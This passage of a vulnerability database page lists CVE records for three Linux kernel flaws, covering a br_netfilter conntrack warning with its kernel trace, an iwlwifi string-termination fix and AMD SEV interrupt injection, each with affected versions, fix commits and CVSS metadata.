br_handle_local_finish+0x20/0x20 [ 57.593782] ? nf_nat_ipv4_pre_routing+0x25/0x60 [nf_nat] [ 57.594279] br_nf_pre_routing+0x24c/0x550 [br_netfilter] [ 57.594780] ? br_nf_hook_thresh+0xf0/0xf0 [br_netfilter] [ 57.595280] br_handle_frame+0x1f3/0x3d0 [ 57.595676] ? br_handle_local_finish+0x20/0x20 [ 57.596118] ? br_handle_frame_finish+0x5e0/0x5e0 [ 57.596566] __netif_receive_skb_core+0x25b/0xfc0 [ 57.597017] ? __napi_build_skb+0x37/0x40 [ 57.597418] __netif_receive_skb_list_core+0xfb/0x220

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/dceb683ab87ca3666…
	https://git.kernel.org/stable/c/b13db0d16bc7b2a52…
	https://git.kernel.org/stable/c/3f59ac29dea092163…
	https://git.kernel.org/stable/c/43193174510ea4f3c…
	https://git.kernel.org/stable/c/751de2012eafa4d46…

Impacted products

Vendor

Product

Version

Linux

Affected: 7c3f28599652acf431a2211168de4a583f30b6d5 , < dceb683ab87ca3666a9bb5c0158528b646faedc4 (git)
Affected: 2b1414d5e94e477edff1d2c79030f1d742625ea0 , < b13db0d16bc7b2a52abcf5cb71334f63faa5dbd6 (git)
Affected: 80cd0487f630b5382734997c3e5e3003a77db315 , < 3f59ac29dea0921637053908fe99268d157bbb9d (git)
Affected: 62e7151ae3eb465e0ab52a20c941ff33bb6332e9 , < 43193174510ea4f3ce09b796e559a2fd9f148615 (git)
Affected: 62e7151ae3eb465e0ab52a20c941ff33bb6332e9 , < 751de2012eafa4d46d8081056761fa0e9cc8a178 (git)
Affected: cb734975b0ffa688ff6cc0eed463865bf07b6c01 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27018",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-23T17:22:22.725918Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:46:18.755Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:17:28.322Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dceb683ab87ca3666a9bb5c0158528b646faedc4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b13db0d16bc7b2a52abcf5cb71334f63faa5dbd6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3f59ac29dea0921637053908fe99268d157bbb9d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/43193174510ea4f3ce09b796e559a2fd9f148615"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/751de2012eafa4d46d8081056761fa0e9cc8a178"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bridge/br_input.c",
            "net/bridge/br_netfilter_hooks.c",
            "net/bridge/br_private.h",
            "net/bridge/netfilter/nf_conntrack_bridge.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "dceb683ab87ca3666a9bb5c0158528b646faedc4",
              "status": "affected",
              "version": "7c3f28599652acf431a2211168de4a583f30b6d5",
              "versionType": "git"
            },
            {
              "lessThan": "b13db0d16bc7b2a52abcf5cb71334f63faa5dbd6",
              "status": "affected",
              "version": "2b1414d5e94e477edff1d2c79030f1d742625ea0",
              "versionType": "git"
            },
            {
              "lessThan": "3f59ac29dea0921637053908fe99268d157bbb9d",
              "status": "affected",
              "version": "80cd0487f630b5382734997c3e5e3003a77db315",
              "versionType": "git"
            },
            {
              "lessThan": "43193174510ea4f3ce09b796e559a2fd9f148615",
              "status": "affected",
              "version": "62e7151ae3eb465e0ab52a20c941ff33bb6332e9",
              "versionType": "git"
            },
            {
              "lessThan": "751de2012eafa4d46d8081056761fa0e9cc8a178",
              "status": "affected",
              "version": "62e7151ae3eb465e0ab52a20c941ff33bb6332e9",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "cb734975b0ffa688ff6cc0eed463865bf07b6c01",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bridge/br_input.c",
            "net/bridge/br_netfilter_hooks.c",
            "net/bridge/br_private.h",
            "net/bridge/netfilter/nf_conntrack_bridge.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "5.15.151",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "6.1.81",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "6.6.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: br_netfilter: skip conntrack input hook for promisc packets\n\nFor historical reasons, when bridge device is in promisc mode, packets\nthat are directed to the taps follow bridge input hook path. This patch\nadds a workaround to reset conntrack for these packets.\n\nJianbo Liu reports warning splats in their test infrastructure where\ncloned packets reach the br_netfilter input hook to confirm the\nconntrack object.\n\nScratch one bit from BR_INPUT_SKB_CB to annotate that this packet has\nreached the input hook because it is passed up to the bridge device to\nreach the taps.\n\n[   57.571874] WARNING: CPU: 1 PID: 0 at net/bridge/br_netfilter_hooks.c:616 br_nf_local_in+0x157/0x180 [br_netfilter]\n[   57.572749] Modules linked in: xt_MASQUERADE nf_conntrack_netlink nfnetlink iptable_nat xt_addrtype xt_conntrack nf_nat br_netfilter rpcsec_gss_krb5 auth_rpcgss oid_registry overlay rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_isc si ib_umad rdma_cm ib_ipoib iw_cm ib_cm mlx5_ib ib_uverbs ib_core mlx5ctl mlx5_core\n[   57.575158] CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.8.0+ #19\n[   57.575700] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n[   57.576662] RIP: 0010:br_nf_local_in+0x157/0x180 [br_netfilter]\n[   57.577195] Code: fe ff ff 41 bd 04 00 00 00 be 04 00 00 00 e9 4a ff ff ff be 04 00 00 00 48 89 ef e8 f3 a9 3c e1 66 83 ad b4 00 00 00 04 eb 91 \u003c0f\u003e 0b e9 f1 fe ff ff 0f 0b e9 df fe ff ff 48 89 df e8 b3 53 47 e1\n[   57.578722] RSP: 0018:ffff88885f845a08 EFLAGS: 00010202\n[   57.579207] RAX: 0000000000000002 RBX: ffff88812dfe8000 RCX: 0000000000000000\n[   57.579830] RDX: ffff88885f845a60 RSI: ffff8881022dc300 RDI: 0000000000000000\n[   57.580454] RBP: ffff88885f845a60 R08: 0000000000000001 R09: 0000000000000003\n[   57.581076] R10: 00000000ffff1300 R11: 0000000000000002 R12: 0000000000000000\n[   57.581695] R13: ffff8881047ffe00 R14: ffff888108dbee00 R15: ffff88814519b800\n[   57.582313] FS:  0000000000000000(0000) GS:ffff88885f840000(0000) knlGS:0000000000000000\n[   57.583040] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[   57.583564] CR2: 000000c4206aa000 CR3: 0000000103847001 CR4: 0000000000370eb0\n[   57.584194] DR0: 0000000000000000 DR1: 0000000000000000 DR2:\n0000000000000000\n[   57.584820] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:\n0000000000000400\n[   57.585440] Call Trace:\n[   57.585721]  \u003cIRQ\u003e\n[   57.585976]  ? __warn+0x7d/0x130\n[   57.586323]  ? br_nf_local_in+0x157/0x180 [br_netfilter]\n[   57.586811]  ? report_bug+0xf1/0x1c0\n[   57.587177]  ? handle_bug+0x3f/0x70\n[   57.587539]  ? exc_invalid_op+0x13/0x60\n[   57.587929]  ? asm_exc_invalid_op+0x16/0x20\n[   57.588336]  ? br_nf_local_in+0x157/0x180 [br_netfilter]\n[   57.588825]  nf_hook_slow+0x3d/0xd0\n[   57.589188]  ? br_handle_vlan+0x4b/0x110\n[   57.589579]  br_pass_frame_up+0xfc/0x150\n[   57.589970]  ? br_port_flags_change+0x40/0x40\n[   57.590396]  br_handle_frame_finish+0x346/0x5e0\n[   57.590837]  ? ipt_do_table+0x32e/0x430\n[   57.591221]  ? br_handle_local_finish+0x20/0x20\n[   57.591656]  br_nf_hook_thresh+0x4b/0xf0 [br_netfilter]\n[   57.592286]  ? br_handle_local_finish+0x20/0x20\n[   57.592802]  br_nf_pre_routing_finish+0x178/0x480 [br_netfilter]\n[   57.593348]  ? br_handle_local_finish+0x20/0x20\n[   57.593782]  ? nf_nat_ipv4_pre_routing+0x25/0x60 [nf_nat]\n[   57.594279]  br_nf_pre_routing+0x24c/0x550 [br_netfilter]\n[   57.594780]  ? br_nf_hook_thresh+0xf0/0xf0 [br_netfilter]\n[   57.595280]  br_handle_frame+0x1f3/0x3d0\n[   57.595676]  ? br_handle_local_finish+0x20/0x20\n[   57.596118]  ? br_handle_frame_finish+0x5e0/0x5e0\n[   57.596566]  __netif_receive_skb_core+0x25b/0xfc0\n[   57.597017]  ? __napi_build_skb+0x37/0x40\n[   57.597418]  __netif_receive_skb_list_core+0xfb/0x220"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:23.897Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/dceb683ab87ca3666a9bb5c0158528b646faedc4"
        },
        {
          "url": "https://git.kernel.org/stable/c/b13db0d16bc7b2a52abcf5cb71334f63faa5dbd6"
        },
        {
          "url": "https://git.kernel.org/stable/c/3f59ac29dea0921637053908fe99268d157bbb9d"
        },
        {
          "url": "https://git.kernel.org/stable/c/43193174510ea4f3ce09b796e559a2fd9f148615"
        },
        {
          "url": "https://git.kernel.org/stable/c/751de2012eafa4d46d8081056761fa0e9cc8a178"
        }
      ],
      "title": "netfilter: br_netfilter: skip conntrack input hook for promisc packets",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27018",
    "datePublished": "2024-05-01T05:30:06.472Z",
    "dateReserved": "2024-02-19T14:20:24.209Z",
    "dateUpdated": "2025-11-04T17:17:28.322Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35845 (GCVE-0-2024-35845)

Vulnerability from cvelistv5 – Published: 2024-05-17 14:40 – Updated: 2025-05-04 09:06

Title

wifi: iwlwifi: dbg-tlv: ensure NUL termination

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: dbg-tlv: ensure NUL termination The iwl_fw_ini_debug_info_tlv is used as a string, so we must ensure the string is terminated correctly before using it.

Severity ?

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CWE

CWE-134 - Use of Externally-Controlled Format String

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/fabe2db7de32a881e…
	https://git.kernel.org/stable/c/96aa40761673da045…
	https://git.kernel.org/stable/c/c855a1a5b7e3de57e…
	https://git.kernel.org/stable/c/783d413f332a3ebec…
	https://git.kernel.org/stable/c/fec14d1cdd92f340b…
	https://git.kernel.org/stable/c/71d4186d470e9cda7…
	https://git.kernel.org/stable/c/ea1d166fae14e05d4…

Impacted products

Vendor

Product

Version

Linux

Affected: a9248de42464e546b624e3fc6a8b04b991af3591 , < fabe2db7de32a881e437ee69db32e0de785a6209 (git)
Affected: a9248de42464e546b624e3fc6a8b04b991af3591 , < 96aa40761673da045a7774f874487cdb50c6a2f7 (git)
Affected: a9248de42464e546b624e3fc6a8b04b991af3591 , < c855a1a5b7e3de57e6b1b29563113d5e3bfdb89a (git)
Affected: a9248de42464e546b624e3fc6a8b04b991af3591 , < 783d413f332a3ebec916664b366c28f58147f82c (git)
Affected: a9248de42464e546b624e3fc6a8b04b991af3591 , < fec14d1cdd92f340b9ba2bd220abf96f9609f2a9 (git)
Affected: a9248de42464e546b624e3fc6a8b04b991af3591 , < 71d4186d470e9cda7cd1a0921b4afda737c6f641 (git)
Affected: a9248de42464e546b624e3fc6a8b04b991af3591 , < ea1d166fae14e05d49ffb0ea9fcd4658f8d3dcea (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "a9248de42464"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "5.5"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "0"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.10.214"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.15.153"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.1.83"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.6.23"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.7.11"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.8.2"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.9"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.1,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35845",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-17T17:22:01.418573Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-134",
                "description": "CWE-134 Use of Externally-Controlled Format String",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-16T21:19:05.842Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.557Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fabe2db7de32a881e437ee69db32e0de785a6209"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/96aa40761673da045a7774f874487cdb50c6a2f7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c855a1a5b7e3de57e6b1b29563113d5e3bfdb89a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/783d413f332a3ebec916664b366c28f58147f82c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fec14d1cdd92f340b9ba2bd220abf96f9609f2a9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/71d4186d470e9cda7cd1a0921b4afda737c6f641"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ea1d166fae14e05d49ffb0ea9fcd4658f8d3dcea"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "fabe2db7de32a881e437ee69db32e0de785a6209",
              "status": "affected",
              "version": "a9248de42464e546b624e3fc6a8b04b991af3591",
              "versionType": "git"
            },
            {
              "lessThan": "96aa40761673da045a7774f874487cdb50c6a2f7",
              "status": "affected",
              "version": "a9248de42464e546b624e3fc6a8b04b991af3591",
              "versionType": "git"
            },
            {
              "lessThan": "c855a1a5b7e3de57e6b1b29563113d5e3bfdb89a",
              "status": "affected",
              "version": "a9248de42464e546b624e3fc6a8b04b991af3591",
              "versionType": "git"
            },
            {
              "lessThan": "783d413f332a3ebec916664b366c28f58147f82c",
              "status": "affected",
              "version": "a9248de42464e546b624e3fc6a8b04b991af3591",
              "versionType": "git"
            },
            {
              "lessThan": "fec14d1cdd92f340b9ba2bd220abf96f9609f2a9",
              "status": "affected",
              "version": "a9248de42464e546b624e3fc6a8b04b991af3591",
              "versionType": "git"
            },
            {
              "lessThan": "71d4186d470e9cda7cd1a0921b4afda737c6f641",
              "status": "affected",
              "version": "a9248de42464e546b624e3fc6a8b04b991af3591",
              "versionType": "git"
            },
            {
              "lessThan": "ea1d166fae14e05d49ffb0ea9fcd4658f8d3dcea",
              "status": "affected",
              "version": "a9248de42464e546b624e3fc6a8b04b991af3591",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: iwlwifi: dbg-tlv: ensure NUL termination\n\nThe iwl_fw_ini_debug_info_tlv is used as a string, so we must\nensure the string is terminated correctly before using it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:42.675Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/fabe2db7de32a881e437ee69db32e0de785a6209"
        },
        {
          "url": "https://git.kernel.org/stable/c/96aa40761673da045a7774f874487cdb50c6a2f7"
        },
        {
          "url": "https://git.kernel.org/stable/c/c855a1a5b7e3de57e6b1b29563113d5e3bfdb89a"
        },
        {
          "url": "https://git.kernel.org/stable/c/783d413f332a3ebec916664b366c28f58147f82c"
        },
        {
          "url": "https://git.kernel.org/stable/c/fec14d1cdd92f340b9ba2bd220abf96f9609f2a9"
        },
        {
          "url": "https://git.kernel.org/stable/c/71d4186d470e9cda7cd1a0921b4afda737c6f641"
        },
        {
          "url": "https://git.kernel.org/stable/c/ea1d166fae14e05d49ffb0ea9fcd4658f8d3dcea"
        }
      ],
      "title": "wifi: iwlwifi: dbg-tlv: ensure NUL termination",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35845",
    "datePublished": "2024-05-17T14:40:12.134Z",
    "dateReserved": "2024-05-17T13:50:33.105Z",
    "dateUpdated": "2025-05-04T09:06:42.675Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-25742 (GCVE-0-2024-25742)

Vulnerability from cvelistv5 – Published: 2024-05-17 21:14 – Updated: 2025-03-27 20:08

Summary

In the Linux kernel before 6.9, an untrusted hypervisor can inject virtual interrupt 29 (#VC) at any point in time and can trigger its handler. This affects AMD SEV-SNP and AMD SEV-ES.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L

CWE

n/a

Assigner

mitre

References

URL

Tags

	https://www.amd.com/en/resources/product-security…
	https://github.com/torvalds/linux/commit/e3ef461a…
	https://git.kernel.org/cgit/linux/kernel/git/torv…
	https://cdn.kernel.org/pub/linux/kernel/v6.x/Chan…

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:52:05.760Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/e3ef461af35a8c74f2f4ce6616491ddb355a208f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e3ef461af35a8c74f2f4ce6616491ddb355a208f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.9"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "LOCAL",
              "availabilityImpact": "LOW",
